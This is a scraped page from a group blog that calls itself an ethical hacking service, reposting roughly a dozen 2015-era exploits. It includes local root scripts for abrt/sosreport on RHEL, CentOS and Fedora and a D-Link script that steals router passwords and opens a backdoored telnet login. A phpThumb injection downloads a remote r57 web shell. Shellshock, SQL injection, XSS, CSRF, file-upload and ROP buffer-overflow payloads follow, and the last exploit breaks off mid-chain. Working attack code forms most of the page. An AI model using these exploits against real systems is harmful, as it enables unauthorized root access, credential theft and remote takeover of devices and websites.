#!/usr/bin/python
# CVE-2015-5287 (?)
# abrt/sosreport RHEL 7.0/7.1 local root
# rebel 09/2015
# [user@localhost ~]$ python sosreport-rhel7.py
# crashing pid 19143
# waiting for dump directory
# dump directory: /var/tmp/abrt/ccpp-2015-11-30-19:41:13-19143
# waiting for sosreport directory
# sosreport: sosreport-localhost.localdomain-20151130194114
# waiting for tmpfiles
# tmpfiles: ['tmpurfpyY', 'tmpYnCfnQ']
# moving directory
# moving tmpfiles
# tmpurfpyY -> tmpurfpyY.old
# tmpYnCfnQ -> tmpYnCfnQ.old
# waiting for sosreport to finish (can take several minutes)........................................done
# success
# bash-4.2# id
# uid=0(root) gid=1000(user) groups=0(root),1000(user) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
# bash-4.2# cat /etc/redhat-release
# Red Hat Enterprise Linux Server release 7.1 (Maipo)
import os,sys,glob,time,sys,socket
payload = "#!/bin/sh\ncp /bin/sh /tmp/sh\nchmod 6755 /tmp/sh\n"
pid = os.fork()
if pid == 0:
os.execl("/usr/bin/sleep","sleep","100")
time.sleep(0.5)
print "crashing pid %d" % pid
os.kill(pid,11)
print "waiting for dump directory"
def waitpath(p):
while 1:
r = glob.glob(p)
if len(r) > 0:
return r
time.sleep(0.05)
dumpdir = waitpath("/var/tmp/abrt/cc*%d" % pid)[0]
print "dump directory: ", dumpdir
os.chdir(dumpdir)
print "waiting for sosreport directory"
sosreport = waitpath("sosreport-*")[0]
print "sosreport: ", sosreport
print "waiting for tmpfiles"
tmpfiles = waitpath("tmp*")
print "tmpfiles: ", tmpfiles
print "moving directory"
os.rename(sosreport, sosreport + ".old")
os.mkdir(sosreport)
os.chmod(sosreport,0777)
os.mkdir(sosreport + "/sos_logs")
os.chmod(sosreport + "/sos_logs",0777)
os.symlink("/proc/sys/kernel/modprobe",sosreport + "/sos_logs/sos.log")
os.symlink("/proc/sys/kernel/modprobe",sosreport + "/sos_logs/ui.log")
print "moving tmpfiles"
for x in tmpfiles:
print "%s -> %s" % (x,x + ".old")
os.rename(x, x + ".old")
open(x, "w+").write("/tmp/hax.sh\n")
os.chmod(x,0666)
os.chdir("/")
sys.stderr.write("waiting for sosreport to finish (can take several minutes)..")
def trigger():
open("/tmp/hax.sh","w+").write(payload)
os.chmod("/tmp/hax.sh",0755)
try: socket.socket(socket.AF_INET,socket.SOCK_STREAM,132)
except: pass
time.sleep(0.5)
try:
os.stat("/tmp/sh")
except:
print "could not create suid"
sys.exit(-1)
print "success"
os.execl("/tmp/sh","sh","-p","-c",'''echo /sbin/modprobe > /proc/sys/kernel/modprobe;rm -f /tmp/sh;python -c "import os;os.setresuid(0,0,0);os.execl('/bin/bash','bash');"''')
sys.exit(-1)
for x in xrange(0,60*10):
if "/tmp/hax" in open("/proc/sys/kernel/modprobe").read():
print "done"
trigger()
time.sleep(1)
sys.stderr.write(".")
print "timed out"
.png.c9b8f3e9eda461da3c0e9ca5ff8c6888.png)
A group blog by Leader in
Hacker Website - Providing Professional Ethical Hacking Services
-
Entries
16114 -
Comments
7952 -
Views
863117772
Contributors to this blog
-
16114
About this blog
Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.
Entries in this blog
# Exploit Title: arbitrary file access kodi web interface
# Shodan dork: title:kodi
# Date: 25-11-2015
# Contact: https://twitter.com/mpronk89
# Software Link: http://kodi.tv/
# Original report: http://forum.kodi.tv/showthread.php?tid=144110&pid=2170305#pid2170305
# Version: v15
# Tested on: linux
# CVE : n/a
kodi web interface vulnerable to arbitrary file read.
example:
<ip>:<port:/%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd
for passwd
(issue fixed in 2012, reintroduced in february 2015. Fixed again november
2015 for v16)
#!/usr/bin/python
# CVE-2015-5273 + CVE-2015-5287
# CENTOS 7.1/Fedora22 local root (probably works on SL and older versions too)
# abrt-hook-ccpp insecure open() usage + abrt-action-install-debuginfo insecure temp directory usage
# rebel 09/2015
# ----------------------------------------
# [user@localhost ~]$ id
# uid=1000(user) gid=1000(user) groups=1000(user) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
# [user@localhost ~]$ cat /etc/redhat-release
# CentOS Linux release 7.1.1503 (Core)
# [user@localhost ~]$ python abrt-centos-fedora.py
# -- lots of boring output, might take a while on a slow connection --
# /var/spool/abrt/abrt-hax-coredump created
# executing crashing process..
# success
# bash-4.2# id
# uid=0(root) gid=1000(user) groups=0(root),1000(user) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
import time,os,datetime,sys,resource,socket
fedora = "Fedora" in open("/etc/redhat-release").read()
# mkdir dir1
# ln -s /var/spool/abrt dir1/hax
# mkdir dir2
# mkdir dir2/hax
# ln -s /proc/sys/kernel/modprobe dir2/hax/abrt-hax-coredump
# cd dir1
# find . -depth -print | cpio -o > ../cpio1
# cd ../dir2
# find . -depth -print | cpio -o > ../cpio2
cpio1 = 'x\x9c;^\xc8\xcc\xa1\xb0\xef\xff\xc2\x17\xcc/\x98\x19\x19\x18\x18>\x86\xde\xdc\xc8\x02\xa4\xf9\x192\x12+\x18\xf4\xcb\x12\x8b\xf4\x8b\x0b\xf2\xf3s\xf4\x13\x93\x8aJ\x18\x8e\x03U\xb3\xef\xfb\xeb\x08R\xcd\x04U\r\xa2\x19\x18\xf4\x80r\x0cp\xc0\x08\xa5\xb9\xc1dH\x90\xa3\xa7\x8fk\x90\xa2\xa2"\xc3(\x18d\x00\x00\x16\xb9\x1bA'.decode("zip")
cpio2 = 'x\x9c;^\xc8\xcc\x917\xfb\xff\xc2\x17\xcc/\x98\x19\x19\x18\x18>\x86\xde\xdc(\x06\xa4%\x192\x12+\xf4\x13\x93\x8aJt\x81\x0c\xdd\xe4\xfc\xa2\xd4\x94\xd2\xdc\x02\x06\xfd\x82\xa2\xfcd\xfd\xe2\xcab\xfd\xec\xd4\xa2\xbc\xd4\x1c\xfd\xdc\xfc\x14\xa0PR*\xc3q\xa0I\x19\xb3\xff:\x82Lb\x82\x9a\xc4\xc2\x00\x02@\x03\xc0\xb2+\xef@d\x99\xa1\xb2L`Y=\xa0\x1c\x03\x1c0Bin0\x19\x12\xe4\xe8\xe9\xe3\x1a\xa4\xa8\xa8\xc80\nh\x02\x00\x01\x980\x88'.decode("zip")
if fedora:
cpio1 = cpio1.replace("/var/spool/abrt","/var/tmp///abrt")
payload = "#!/bin/sh\ncp /bin/sh /tmp/sh\nchmod 6755 /tmp/sh\n"
# we use a 32 bit binary because [vsyscall] will be at the end of the coredump on 64 bit binaries
# and we can't control the contents of that region. on 32 bit binaries [stack] is at the end
# the crashing binary will just fill the stack with /tmp/hax.sh which subsequently gets written
# to /proc/sys/kernel/modprobe by /usr/libexec/abrt-hook-ccpp
elf = 'x\x9c\xabw\xf5qcddd\x80\x01&\x06f\x06\x10/\xa4\x81\x85\xc3\x84\x01\x01L\x18\x14\x18`\xaa\xe0\xaa\x81j@x1\x90\t\xc2\xac 1\x01\x06\x06\x97F\x1b\x15\xfd\x92\xdc\x82\xd2o\x8dg\xfe\xf3\x03\xf9\xbb\xbe\x00\xb5\xec\x14\x01\xca\xee\xee\x07\xaa\xd7<\xd3\xc5\xdc\xc1\xa2\xe2\xe2\xfc\xe8{\xf3\x1b\x11\xaf\xe6_\x0c\xa5\x8fv8\x02\xc1\xff\x07\xfaP\x00\xd4\xad\x9f\x91X\xa1W\x9c\xc1\xc5\x00\x00-f"X'.decode("zip")
# most people don't have nasm installed so i preassembled it
# if you're not brave enough to run the preassembled file, here's the code :)
"""
; abrt-hax.asm
; nasm -f bin -o abrt-hax abrt-hax.asm
BITS 32
org 0x08048000
ehdr: ; Elf32_Ehdr
db 0x7F, "ELF", 1, 1, 1, 0 ; e_ident
times 8 db 0
dw 2 ; e_type
dw 3 ; e_machine
dd 1 ; e_version
dd _start ; e_entry
dd phdr - $$ ; e_phoff
dd 0 ; e_shoff
dd 0 ; e_flags
dw ehdrsize ; e_ehsize
dw phdrsize ; e_phentsize
dw 1 ; e_phnum
dw 0 ; e_shentsize
dw 0 ; e_shnum
dw 0 ; e_shstrndx
ehdrsize equ $ - ehdr
phdr: ; Elf32_Phdr
dd 1 ; p_type
dd 0 ; p_offset
dd $$ ; p_vaddr
dd $$ ; p_paddr
dd filesize ; p_filesz
dd filesize ; p_memsz
dd 5 ; p_flags
dd 0x1000 ; p_align
phdrsize equ $ - phdr
_start:
inc esp
cmp dword [esp],0x706d742f
jne l
or esp,0xfff
inc esp
mov edx,500
l3:
mov ecx,msglen
mov ebx,message
sub esp,ecx
l2:
mov al,[ebx]
mov [esp],al
inc esp
inc ebx
loop l2
sub esp,msglen
dec edx
cmp edx,0
jne l3
mov eax,0x41414141
jmp eax
message db '////////tmp/hax.sh',0x0a,0
msglen equ $-message
"""
build_id = os.popen("eu-readelf -n /usr/bin/hostname").readlines()[-1].split()[-1]
os.chdir("/tmp")
open("build_ids","w+").write(build_id + "\n")
print build_id
def child():
timestamp = int(time.time())
for i in xrange(0,3):
try:
t = datetime.datetime.fromtimestamp(timestamp+i)
d = "/var/tmp/abrt-tmp-debuginfo-%s.%u" % (t.strftime("%Y-%m-%d-%H:%M:%S"), os.getpid())
os.mkdir(d)
os.chmod(d,0777)
os.symlink("/var/tmp/haxfifo",d+"/unpacked.cpio")
print "created %s" % d
except: pass
os.execl("/usr/libexec/abrt-action-install-debuginfo-to-abrt-cache","abrt-action-install-debuginfo-to-abrt-cache","-y")
try:
os.mkfifo("/var/tmp/haxfifo")
os.chmod("/var/tmp/haxfifo",0666)
except:
pass
def fifo(a):
print "reading from fifo.."
open("/var/tmp/haxfifo").read()
print "done"
print "writing to fifo.."
open("/var/tmp/haxfifo","w+").write(a)
print "done"
if os.fork() == 0: child()
print "first cpio..."
fifo(cpio1)
os.wait()
time.sleep(1)
if os.fork() == 0: child()
print "second cpio..."
fifo(cpio2)
os.wait()
time.sleep(1)
if fedora:
sym = "/var/tmp/abrt/abrt-hax-coredump"
else:
sym = "/var/spool/abrt/abrt-hax-coredump"
try:
os.lstat(sym)
except:
print "could not create symlink"
sys.exit(-1)
print "%s created" % sym
open("/tmp/abrt-hax","w+").write(elf)
os.chmod("/tmp/abrt-hax",0755)
if os.fork() == 0:
resource.setrlimit(resource.RLIMIT_CORE,(resource.RLIM_INFINITY,resource.RLIM_INFINITY,))
print "executing crashing process.."
os.execle("/tmp/abrt-hax","",{})
os.wait()
time.sleep(1)
if "/tmp/hax" not in open("/proc/sys/kernel/modprobe").read():
print "could not modify /proc/sys/kernel/modprobe"
sys.exit(-1)
open("/tmp/hax.sh","w+").write(payload)
os.chmod("/tmp/hax.sh",0755)
try:
socket.socket(socket.AF_INET,socket.SOCK_STREAM,132)
except:
pass
time.sleep(0.5)
try:
os.stat("/tmp/sh")
except:
print "could not create suid"
sys.exit(-1)
print "success"
os.execl("/tmp/sh","sh","-p","-c",'''echo /sbin/modprobe > /proc/sys/kernel/modprobe;rm -f /tmp/sh;rm -rf /var/cache/abrt-di/hax;python -c "import os;os.setresuid(0,0,0);os.execl('/bin/bash','bash');"''')
# Vulnerability title: ntop-ng <= 2.0.151021 - Privilege Escalation
# Author: Dolev Farhi
# Contact: dolev at flaresec.com
# Vulnerable version: 2.0.151021
# Fixed version: 2.2
# Link: ntop.org
# Date 27.11.2015
# CVE-2015-8368
# Product Details:
ntopng is the next generation version of the original ntop, a network traffic probe that shows the network usage, similar to what the popular top Unix command does. ntopng is based on libpcap and it has been written in a portable way in order to virtually run on every Unix platform, MacOSX and on Windows as well.
# Vulnerability Details:
in the latest stable release of ntop-ng it is possible to escalate the privileges of a non-privileged user to the admin account by resetting the password, intercepting the request and replacing the HTTP parameters.
# Vulnerability Proof of concept
1. Login with an unprivileged account
2. Change the account password and intercept the request, modify the username= and Cookie user= and change to the admin account
Example:
GET /lua/admin/password_reset.lua?csrf=XXXXXXXXXXXXXXXXXX&username=admin&old_password=12345&new_password=123456&confirm_new_password=123456 HTTP/1.1
Cookie: user=admin; session=XXXXXXXXXXXXXXXXXXXXXXXXX
3. Login with the admin account and the password you defined in step #3.
Voila! you're an administrator.
# Exploit Title: IP.Board Persistent XSS Vulnerability
# Date: 29/10/2015
# Software Link: https://www.invisionpower.com/buy
# Software version : 4.1.4.x
# Exploit Author: Mehdi Alouache
# Contact: mehdi.alouache@etu.univ-lehavre.fr
# Category: webapps
1. Description
Any registered user can execute remote javascript code by sending a
private message to another user. The malicious JS code has to
be written in the title of the message, and the receiver must have
enabled the notifications when a new message is delivered.
Note that the code will be directly executed as soon as the notification
appear. (The receiver doesn't even need to check his
inbox).
2. Proof of Concept
Register on the forum (IP.Board) of a website as a regular user, and
send a message to any user having the message notifications
enabled. In the title field (and only here), a simple
<script>alert(1)</script> will show a dialog box to the victim.
3. Solution:
Patch the vulnerability with the (incoming) associated patch.
--
ALOUACHE Mehdi
Departement informatique
Groupe A
mehdi.alouache@hotmail.fr
mehdi.alouache@etu.univ-lehavre.fr
source: https://www.securityfocus.com/bid/63547/info
Google Android is prone to a security-bypass vulnerability.
Attackers can exploit this issue to bypass certain security restrictions to perform unauthorized actions. This may aid in further attacks.
Android 4.4 is vulnerable; other versions may also be affected.
#!/usr/bin/python
import zipfile
import struct
import sys
# usage: ./pocB.py new.apk old.apk file data
zout = zipfile.ZipFile(sys.argv[1], "w")
zin = zipfile.ZipFile(sys.argv[2], "r")
replace = sys.argv[3]
new = open(sys.argv[4], 'r').read()
fp = zout.fp
for name in zin.namelist():
old = zin.read(name)
if name != replace:
zout.writestr(name, old, zipfile.ZIP_DEFLATED)
else:
assert len(new) <= len(old)
# write header, old data, and record offset
zout.writestr(name, old, zipfile.ZIP_STORED)
offset = fp.tell()
# return to name length, set to skip old data
fp.seek(-len(old) -len(name) -4, 1)
fp.write(struct.pack('<h', len(name) + len(old)))
# after old data, write new data \0 padded
fp.seek(offset)
fp.write(new)
fp.write('\0' * (len(old) - len(new)))
zout.close()
zin.close()
source: https://www.securityfocus.com/bid/64048/info
Net-SNMP is prone to a remote denial-of-service vulnerability.
Attackers can exploit this issue to cause the SNMPD to crash, exhaust CPU resources or trigger infinite loop; denying service to legitimate users.
Net-SNMP 5.7.1 is vulnerable; other versions may also be affected.
#!/bin/sh
SNMPOPTS="-v1 -c public"
LUCKYSNMPD=$1
SNMPWALKCMD="snmpwalk $SNMPOPTS $LUCKYSNMPD"
SNMPGETCMD="snmpget $SNMPOPTS $LUCKYSNMPD"
SNMPGETNEXTCMD="snmpgetnext $SNMPOPTS $LUCKYSNMPD"
TESTMIB=.1.3.6.1.4.1.8072.2
TESTTELEM=$TESTMIB.5
TESTHDD=$TESTMIB.1.1.2
while true
do
$SNMPGETNEXTCMD $TESTTELEM.1.1.4.1 $TESTTELEM.1.1.4.2 $TESTTELEM.1.1.4.3 $TESTTELEM.1.1.2.1 $TESTTELEM.1.1.4.5 $TESTTELEM.1.1.2.3 $TESTTELEM.1.1.6.1 $TESTTELEM.1.1.2.1 $TESTTELEM.1.1.3.1 $TESTTELEM.1.1.1.2 $TESTTELEM.1.1.1.2 $TESTTELEM.1.1.2.1 $TESTTELEM.1.1.4.1 $TESTTELEM.1.1.2.1 $TESTTELEM.1.1.3.3 $TESTTELEM.1.1.2.1 $TESTTELEM.1.1.8.1 $TESTTELEM.1.1.2.1 $TESTTELEM.1.1.6.1 $TESTTELEM.1.1.2.1
$SNMPGETNEXTCMD $TESTTELEM.1.1.4.1 $TESTTELEM.1.1.2.1 $TESTTELEM.1.1.8.1 $TESTTELEM.1.1.2.1 $TESTTELEM.1.1.4.1 $TESTTELEM.1.1.2.1 $TESTTELEM.1.1.6.1 $TESTTELEM.1.1.2.1 $TESTTELEM.1.1.7.1 $TESTTELEM.1.1.2.1
for i in 1 2 3
do
$SNMPGETNEXTCMD $TESTTELEM.1.1.3 $TESTTELEM.1.1.2 $TESTTELEM.1.1.4 $TESTTELEM.1.1.2 $TESTHDD.4 $TESTHDD.5 $TESTHDD.7 $TESTHDD.5 $TESTHDD.2 $TESTHDD.1 $TESTHDD.4 $TESTHDD.1 $TESTHDD.7 $TESTHDD.1 $TESTHDD.8 $TESTHDD.1 $TESTHDD.14 $TESTHDD.1 $TESTHDD.13 $TESTHDD.1
done
done
* Exploit Title: WordPress Users Ultra Plugin [Blind SQL injection]
* Discovery Date: 2015/10/19
* Public Disclosure Date: 2015/12/01
* Exploit Author: Panagiotis Vagenas
* Contact: https://twitter.com/panVagenas
* Vendor Homepage: http://usersultra.com
* Software Link: https://wordpress.org/plugins/users-ultra/
* Version: 1.5.50
* Tested on: WordPress 4.3.1
* Category: webapps
Description
========================================================================
One can perform an SQL injection attack simply by exploiting the following =
WP ajax actions:
1. `edit_video`
2. `delete_photo`
3. `delete_gallery`
4. `delete_video`
5. `reload_photos`
6. `edit_gallery`
7. `edit_gallery_confirm`
8. `edit_photo`
9. `edit_photo_confirm`
10. `edit_video_confirm`
11. `set_as_main_photo`
12. `sort_photo_list`
13. `sort_gallery_list`
14. `reload_videos`
POST parameters that are exploitable in each action respectively:
1. `video_id`
2. `photo_id`
3. `gal_id`
4. `video_id`
5. `gal_id`
6. `gal_id`
7. `gal_id`
8. `photo_id`
9. `photo_id`
10. `video_id`
11. `photo_id`, `gal_id`
12. `order`
13. `order`
14. `video_id`
In case #7 a user can also change the gallery name, description and visibil=
ity by setting POST parameters `gal_name`, `gal_desc` and `gal_visibility` =
respectively.
In case #8 `photo_id` is first casted to integer and a query to DB is perfo=
rmed. If results are returned then for each result a new query is performed=
without casting the `photo_id` to integer. So if an attacker knows a valid=
video id then it can perform the attack in the second query. This achievab=
le because `<?php (int)'1 and sleep(5)' === 1; ?>
In case #9 a user can also change the photo name, description, tags and cat=
egory by setting POST parameters `photo_name`, `photo_desc`, `photo_tags` a=
nd `photo_category` respectively.
In case #10 a user can also change the video name, unique id and type by se=
tting POST parameters `video_name`, `video_unique_id` and `video_type` resp=
ectively.
Because function wpdb::get_results() and wpdb::query() are in use here, onl=
y one SQL statement can be made per request. This holds severity of the att=
ack low.
In addition all actions are privileged so the user must have an active acco=
unt in vulnerable website, in order to perform the attack.
PoC
========================================================================
Send a post request to `http://my.vulnerable.website.com/wp-admin/admin-aja=
x.php` with data: `action=edit_video&video_id=1 and sleep(5) `
Timeline
========================================================================
2015/10/29 - Vendor notified via email
2015/11/11 - Vendor notified via contact form in his website
2015/11/13 - Vendor notified via support forums at wordpress.org
2015/11/14 - Vendor responded and received report through email
2015/12/08 - Vendor provided new version 1.5.63 which resolves issues
Solution
========================================================================
Upgrade to version 1.5.63
source: https://www.securityfocus.com/bid/64043/info
Multiple D-Link DIR series routers are prone to a local file-disclosure vulnerability because it fails to adequately validate user-supplied input.
Exploiting this vulnerability would allow an attacker to obtain potentially sensitive information from local files on devices running the vulnerable application. This may aid in further attacks.
#!/bin/sh
if [ -z "$1" ]; then
echo "d-link DIR-300 (all), DIR-600 (all), DIR-615 (fw 4.0)";
echo "exploited by AKAT-1, 22733db72ab3ed94b5f8a1ffcde850251fe6f466, c8e74ebd8392fda4788179f9a02bb49337638e7b";
echo "usage: $0 [router address] [telnet port]";
exit 0;
fi;
if [ -z "$2" ]; then
TPORT=3333;
else
TPORT=$2;
fi
UPORT=31337;
echo "Trying $1 ...";
HTTPASSWD=`curl -sS "http://$1/model/__show_info.php?REQUIRE_FILE=/var/etc/httpasswd"; | grep -A1 "<center>" | tail -1 |
sed -e "s/\t//g ; s/^\([^:]*\):\([^:]*\)$/\1\n \2/g"`;
if [ ! -z "$HTTPASSWD" ]; then
L=`echo $HTTPASSWD | cut -d' ' -f1`;
P=`echo $HTTPASSWD | cut -d' ' -f2`;
echo "found username: $L";
echo "found password: $P";
curl -d "ACTION_POST=LOGIN&LOGIN_USER=$L&LOGIN_PASSWD=$P" -sS "http://$1/login.php"; | grep -v "fail"
1>/dev/null;
if [ $? -eq 0 ]; then
curl -sS
"http://$1/tools_system.xgi?random_num=2011.9.22.13.59.33&exeshell=../../../../usr/sbin/iptables -t nat -A PRE_MISC -i
eth0.2 -p tcp --dport $TPORT -j ACCEPT&set/runtime/syslog/sendmail=1" 1>/dev/null;
curl -sS
"http://$1/tools_system.xgi?random_num=2011.9.22.13.59.33&exeshell=../../../../usr/sbin/iptables -t nat -A PRE_MISC -i
eth0.2 -p tcp --dport $UPORT -j ACCEPT&set/runtime/syslog/sendmail=1" 1>/dev/null;
curl -sS
"http://$1/tools_system.xgi?random_num=2011.9.22.13.59.33&exeshell=../../../../usr/sbin/telnetd -p $TPORT -l
/usr/sbin/login -u hacked:me&set/runtime/syslog/sendmail=1" 1>/dev/null;
echo "if you are lucky telnet is listening on $TPORT (hacked:me) ..."
curl -sS "http://$1/logout.php"; 1>/dev/null;
fi
fi
CHAP=`curl -sS "http://$1/model/__show_info.php?REQUIRE_FILE=/etc/ppp/chap-secrets"; | grep -A1 "<center>" | sed -e
"s/<center>//g"`;
if [ ! -z "$CHAP" ]; then
echo "found chap-secrets: $CHAP";
fi
echo "Bye bye.";
exit 0;
source: https://www.securityfocus.com/bid/64041/info
phpThumb is prone to a vulnerability that lets attackers upload arbitrary files. The issue occurs because it fails to properly validate file extensions before uploading them.
An attacker may leverage this issue to upload arbitrary files to the affected computer; this can result in arbitrary code execution within the context of the vulnerable application.
Note: This BID was previously titled 'Joomla! Alphacontent Component 'phpThumb.php' Arbitrary File Upload Vulnerability'. The title and technical details have been changed to better reflect the underlying component affected.
#!/usr/bin/perl
use LWP::UserAgent;
use HTTP::Request;
$target = $ARGV[0];
if($target eq '')
{
print "======================================================\n";
print " DEVILSCREAM - WWW.NEWBIE-SECURITY.OR.ID \n";
print "======================================================\n";
sleep(0.8);
print "Usage: perl exploit.pl <target> \n";
exit(1);
}
if ($target !~ /http:\/\//)
{
$target = "http://$target";
}
#print "[*] Enter the address of your hosted TXT shell (ex: '
http://c99.gen.tr/r57.txt') => ";
#$shell = <STDIN>;
sleep(1);
print "======================================================\n";
print " DEVILSCREAM - WWW.NEWBIE-SECURITY.OR.ID \n";
print "======================================================\n";
sleep(1.1);
print "[*] Testing exploit ... \n";
sleep(1.1);
$agent = LWP::UserAgent->new();
$agent->agent('Mozilla/5.0 (X11; Linux i686; rv:14.0) Gecko/20100101
Firefox/14.0.1');
$shell = "wget http://www.r57c99shell.net/shell/r57.txt -O shell.txt";
$website =
"$target/components/com_alphacontent/assets/phpThumb/phpThumb.php??src=file.jpg&fltr
[]=blur|9 -quality 75 -interlace line fail.jpg jpeg:fail.jpg ; $shell ;
&phpThumbDebug=9";
$request = $agent->request(HTTP::Request->new(GET=>$website));
if ($request->is_success)
{
print "[+] Exploit sent with success. \n";
sleep(1.4);
}
else
{
print "[-] Exploit sent but probably the website is not vulnerable. \n";
sleep(1.3);
}
print "[*] Checking if the txt shell has been uploaded...\n";
sleep(1.2);
$cwebsite =
"$target/components/com_alphacontent/assets/phpThumb/shell.txt";
$creq = $agent->request(HTTP::Request->new(GET=>$cwebsite));
if ($creq->is_success)
{
print "[+] Txt Shell uploaded :) \n";
sleep(1);
print "[*] Moving it to PHP format... Please wait... \n";
sleep(1.1);
$mvwebsite =
"$target/components/com_alphacontent/assets/phpThumb/phpThumb.php?
src=file.jpg&fltr[]=blur|9 -quality 75 -interlace line fail.jpg
jpeg:fail.jpg ; mv shell.txt shell.php ;
&phpThumbDebug=9";
$mvreq = $agent->request(HTTP::Request->new(GET=>$mvwebsite));
$cwebsite =
"$target/components/com_alphacontent/assets/phpThumb/shell.php";
$c2req = $agent->request(HTTP::Request->new(GET=>$cwebsite));
if ($c2req->is_success)
{
print "[+] PHP Shell uploaded => $cwebsite :) \n";
sleep(0.8);
print "[*] Do you want to open it? (y/n) => ";
$open = <STDIN>;
if ($open == "y")
{
$firefox = "firefox $cwebsite";
system($firefox);
}
}
else
{
print "[-] Error while moving shell from txt to PHP :( \n";
exit(1);
}
}
else
{
print "[-] Txt shell not uploaded. :( \n";
}
source: https://www.securityfocus.com/bid/63908/info
LevelOne WBR-3406TX router is prone to a cross-site request-forgery vulnerability.
Attackers can exploit this issue to perform certain administrative actions and gain unauthorized access to the affected device.
<html>
<body>
<form action="http://www.example.com/cgi-bin/pass" method="POST">
<input type="hidden" name="rc" value="@" />
<input type="hidden" name="Pa" value="1234567" />
<input type="hidden" name="P1" value="1234567" />
<input type="hidden" name="rd" value="atbox" />
<input type="submit" value="Submit form" />
</form>
</body>
</html>
source: https://www.securityfocus.com/bid/63880/info
Thomson Reuters Velocity Analytics is prone to a vulnerability that lets attackers inject and execute arbitrary code.
Successfully exploiting this issue may allow an attacker to upload and execute arbitrary code with SYSTEM privileges.
Thomson Reuters Velocity Analytics 6.94 build 2995 is vulnerable; other versions may also be affected.
http://www.example.com/VhttpdMgr?action=importFile&fileName={BACKDOOR}
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit4 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => 'Advantech Switch Bash Environment Variable Code Injection (Shellshock)',
'Description' => %q{
This module exploits the Shellshock vulnerability, a flaw in how the Bash shell
handles external environment variables. This module targets the 'ping.sh' CGI
script, acessible through the Boa web server on Advantech switches. This module
was tested against firmware version 1322_D1.98.
},
'Author' => 'hdm',
'References' => [
['CVE', '2014-6271'],
['CWE', '94'],
['OSVDB', '112004'],
['EDB', '34765'],
['URL', 'https://community.rapid7.com/community/infosec/blog/2015/12/01/r7-2015-25-advantech-eki-multiple-known-vulnerabilities'],
['URL', 'https://access.redhat.com/articles/1200223'],
['URL', 'http://seclists.org/oss-sec/2014/q3/649']
],
'Privileged' => false,
'Arch' => ARCH_CMD,
'Platform' => 'unix',
'Payload' =>
{
'Space' => 1024,
'BadChars' => "\x00\x0A\x0D",
'DisableNops' => true,
'Compat' =>
{
'PayloadType' => 'cmd',
'RequiredCmd' => 'openssl generic'
}
},
'Targets' => [[ 'Automatic Targeting', { 'auto' => true } ]],
'DefaultTarget' => 0,
'License' => MSF_LICENSE,
'DisclosureDate' => 'Dec 01 2015'
))
register_options([
Opt::RPORT(80)
], self.class)
end
#
# CVE-2014-6271
#
def cve_2014_6271(cmd)
%{() { :;}; $(#{cmd}) & }
end
#
# Check credentials
#
def check
res = send_request_cgi(
'method' => 'GET',
'uri' => '/cgi-bin/ping.sh'
)
if !res
vprint_error("#{peer} - No response from host")
return Exploit::CheckCode::Unknown
elsif res.headers['Server'] =~ /Boa\/(.*)/
vprint_status("#{peer} - Found Boa version #{$1}")
else
print_status("#{peer} - Target is not a Boa web server")
return Exploit::CheckCode::Safe
end
if res.body.to_s.index('127.0.0.1 ping statistics')
return Exploit::CheckCode::Detected
else
vprint_error("#{peer} - Target does not appear to be an Advantech switch")
return Expoit::CheckCode::Safe
end
end
#
# Exploit
#
def exploit
cmd = cve_2014_6271(payload.encoded)
vprint_status("#{peer} - Trying to run command '#{cmd}'")
res = send_request_cgi(
'method' => 'GET',
'uri' => '/cgi-bin/ping.sh',
'agent' => cmd
)
end
end
source: https://www.securityfocus.com/bid/63836/info
The Suco themes for WordPress is prone to a vulnerability that lets attackers upload arbitrary files. The issue occurs because the application fails to adequately sanitize user-supplied input.
An attacker may leverage this issue to upload arbitrary files to the affected computer; this can result in arbitrary code execution within the context of the vulnerable application.
<?php
$uploadfile="devilscream.php";
$ch = curl_init("http://127.0.0.1/wp-content/themes/suco/themify/themify-ajax.php?upload=1");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
array('Filedata'=>"@$uploadfile"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";
?>
#!/usr/bin/env python
#
# Exploit title: Easy File Sharing Web Server v7.2 - Remote SEH Buffer Overflow (DEP bypass with ROP)
# Date: 29/11/2015
# Exploit Author: Knaps
# Contact: @TheKnapsy
# Website: http://blog.knapsy.com
# Software Link: http://www.sharing-file.com/efssetup.exe
# Version: Easy File Sharing Web Server v7.2
# Tested on: Windows 7 x64, but should work on any other Windows platform
#
# Notes:
# - based on non-DEP SEH buffer overflow exploit by Audit0r (https://www.exploit-db.com/exploits/38526/)
# - created for fun & practice, also because it's not 1998 anymore - gotta bypass that DEP! :)
# - bad chars: '\x00' and '\x3b'
# - max shellcode size allowed: 1260 bytes
#
import sys, socket, struct
# ROP chain generated with mona.py - www.corelan.be (and slightly fixed by @TheKnapsy)
# Essentially, use PUSHAD to set all parameters and call VirtualProtect() to disable DEP.
def create_rop_chain():
rop_gadgets = [
# Generate value of 201 in EAX
0x10015442, # POP EAX # RETN [ImageLoad.dll]
0xFFFFFDFF, # Value of '-201'
0x100231d1, # NEG EAX # RETN [ImageLoad.dll]
# Put EAX into EBX (other unneccessary stuff comes with this gadget as well...)
0x1001da09, # ADD EBX,EAX # MOV EAX,DWORD PTR SS:[ESP+C] # INC DWORD PTR DS:[EAX] # RETN [ImageLoad.dll]
# Carry on with the ROP as generated by mona.py
0x10015442, # POP EAX # RETN [ImageLoad.dll]
0x61c832d0, # ptr to &VirtualProtect() [IAT sqlite3.dll]
# Compensate for the ADD EBX,EAX gadget above, jump over 1 address, which is a dummy writeable location
# used solely by the remaining part of the above gadget (it doesn't really do anything for us)
0x1001281a, # ADD ESP,4 # RETN [ImageLoad.dll]
0x61c73281, # &Writable location [sqlite3.dll]
# And carry on further as generated by mona.py
0x1002248c, # MOV EAX,DWORD PTR DS:[EAX] # RETN [ImageLoad.dll]
